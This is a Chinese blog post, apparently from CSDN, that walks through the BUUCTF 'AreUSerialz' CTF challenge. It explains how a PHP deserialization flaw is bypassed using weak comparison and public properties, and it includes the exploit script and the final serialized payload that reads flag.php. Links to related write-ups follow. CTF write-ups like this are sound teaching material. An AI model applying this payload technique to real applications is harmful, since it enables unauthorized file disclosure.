BUUCTF [网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2023-11-27 16:40:55 发布
最新推荐文章于 2023-11-27 16:40:55 发布
阅读量1.4k 收藏
点赞数
分类专栏: BUUCTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53863234/article/details/120547932
版权

打开后发现是代码审计的题(虽然很长,但很简单)
在这里插入图片描述
好长一串代码,刚开始做都不想看,想放弃,但还是继续读下去了,而且还差点做出来了
可以看到这里定义了一个filehandler类,可以读代码,写入代码
我首先就想到了当0p=2的时候可以读出flag.php的内容,又可以看到
在析构函数中:

function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
        }

在process函数中:

if($this->op == "2") {
            $res = $this->read();
            $this->output($res);

一个是三个等号,一个是两个,嘿嘿那不就绕过了吗?直接0p=2了
下面有一个is_valid函数:

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
    }

它的作用是检测可以显示的字符,但是这里的类是protect类型的,在生成序列化时,是这种形式的
%00*%00属性名,其中的%00是不可见的,绕过不了这个函数,卡住了
然后百度了一下,看了一下大佬的wp,说的是在php7.1的环境下对属性的要求不是很敏感,在这里可以用public属性,然后绕过。(又学到了一招)

<?php
class FileHandler {

public $op=2;
public $filename="flag.php";
public $content;
}
$a=new FileHandler;
echo serialize($a);
?>

然后payload:/?str=O:11:“FileHandler”:3:{s:2:“op”;i:2;s:8:“filename”;s:8:“flag.php”;s:7:“content”;N;}
拿到在源码里面显示的flag
在这里插入图片描述

早川秋zcq
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-[网鼎杯 2020 青龙]虚幻2
m0_67507776的博客
05-10 1584
1.打开得到一个无后缀文件,使用010 Editor 打开,查看文件类型 2.后缀更改为png,打开发现可能与通道有关 3.使用stegsolve打开,分别保存R、G、B三个通道的图片 4.思路详解见大神wp:2020网鼎杯-青龙-虚幻2 手撸的步骤是将 RGB 通道分开得到的图片按 G, R, B 的顺序分别逐行拆成条,逐行交叉按顺序拼接,由左向右按拼完之后,将得到的图片逆时针旋转 90 度,再把左下角的 7*7 的寻像...
2020网鼎杯青龙Boom
05-12
【标题】"2020网鼎杯青龙Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
BUUCTF [web专项27][网鼎杯 2020 青龙]AreUSerialz
yanglinchiji的博客
11-06 207
1.FileHandler作为函数名是固定的,否则不会回显(至少我是这样的)(FileHandler 的作用是对外提供统一的文件读写 API,用户可以在无感知的情况下读写各种类型的文件)2.protected权限的变量在序列化时会有%00*%00字符,%00字符的ASCII码为0,不在is_valid函数规定的32到125的范围内。发现是获取filename的内容,那么我们使用伪协议进行获取flag.php(头有包含flag.php的提示)1.op==2为true且op==="2"失效(即op=2)
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙]AreUSerialz
qq_58869808的博客
07-26 1601
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙]AreUSerialz
BUUCTF [网鼎杯 2020 青龙]AreUSerialz 1 (两种解法 超详细!)
最新发布
m0_73734159的博客
11-27 1588
*include() ** 包含函数 ** ****is_valid() ** 检查对象变量是否已经实例化,即实例变量的值是否是个有效的对象。**file_get_contents() ** 函数把整个文件读入一个字符串中。**file_put_contents() **函数把一个字符串写入文件中。
BUUCTF-[网鼎杯 2020 青龙]AreUSerialz
qq_71467825的博客
06-21 117
这里绕过方法就是直接改成public,原因是php7.1以上的版本对属性类型不敏感类型,而public属性序列化不会不可见字符。绕过方法:可以使传入的op是数字2,从而使第一个强比较返回false,而使第二个弱比较返回true。这里注意protacted在序列化之后会出现不可见字符\00*\100,不符合上面的要求。这里的destruct()魔术方法会在传参是2的字符的时候,对传入的参数进行赋值。这里的比较是===强比较,而在process()函数是弱比较。这里需要传入一个序列化之后的类对象。
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
20200510.网鼎杯青龙.zip
06-10
2020 5 10 网鼎杯 青龙 比赛题目 web没有附件 其他基本都有 , 感谢各位师傅的整理
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎。
[BUUCTF]AreUSerialz (writeup)
weixin_63306244的博客
06-22 127
3、_destruct魔术,如果op==2时则op输出"1"(因为只有===才是全等,所以可以利用==的属性来在2前面加一个0或空格)4、如果输入的filename是存在的输出文件内容(filename=flag.php)2、如果op等于" 1 "则是写,等于" 2 "则是读取。1、由最上面的提示可得flag在flag.php内。最后他的代码处是用GET传入,赋值给str。所以最后的payload为。他的flag也藏在了源码里。看题的知是一道反序列化题。
buuctf - [网鼎杯 2020 青龙]AreUSerialz
qq_40860153的博客
10-11 2548
1.题目源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content
buuctf-[网鼎杯 2020 青龙]AreUSerialz(小宇特详解)
小宇的web博客
01-28 2740
buuctf-[网鼎杯 2020 青龙]AreUSerialz(小宇特详解) <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op;//protected受保护的修饰符,被定义为受保护的类成员则可以被其自身以及其子类和父类访问 protected $filename; protected $content; function _
BUUCTF学习笔记-AreUSerialz 网鼎杯 2020 青龙
Emmawas的博客
09-27 211
BUUCTF学习笔记-AreUSerialz 网鼎杯 2020 青龙 含重要函数学习
buuCTF-AreUSerialz_第二届网鼎杯web
Fisher
05-22 699
写在前面: web菜鸟,在做buuctf中的网鼎杯赛题的时候,有去学习了一遍php反序列,加深了理解。 为什么会用到序列化,自己的理解就是当一段代码消失时候,保存的数据也会跟着消失,但时如果要是再去使用这些数据的时候,如果在添加十分的不方便,于是就出现了序列化,将数据保存起来。 关键点: 1.我们想用反序列必须存在 unserialize(),且提交的变量可控。 unserialize():反序列化,将字符串转化为类。 serialize():序列化,将类转化为字符串。 2.可控的值,为class 类中的属
buuctf-AreUSerialz
m0_62094846的博客
03-24 1516
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "He.
Buuctf[网鼎杯 2020 青龙]AreUSerialz
weixin_52653109的博客
04-07 3289
[网鼎杯 2020 青龙]AreUSerialz 打开题目仔细阅读源码 <?php include("flag.php"); highlight_file(__FILE__); //文件包含,联想到php://filter伪协议读取文件 class FileHandler { protected $op;//protected保护类,成员可以被自身以及其子类和父类访问 protected $filename; protected $content;
允许外网访问青龙面板
10-10
要允许外网访问青龙面板,您需要进行以下操作: 1. 配置防火墙规则:确保服务器的防火墙允许外部访问面板的端口。默认情况下,青龙面板使用的是5700端口,您可以根据自己的需要进行配置。 2. 配置面板监听地址:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值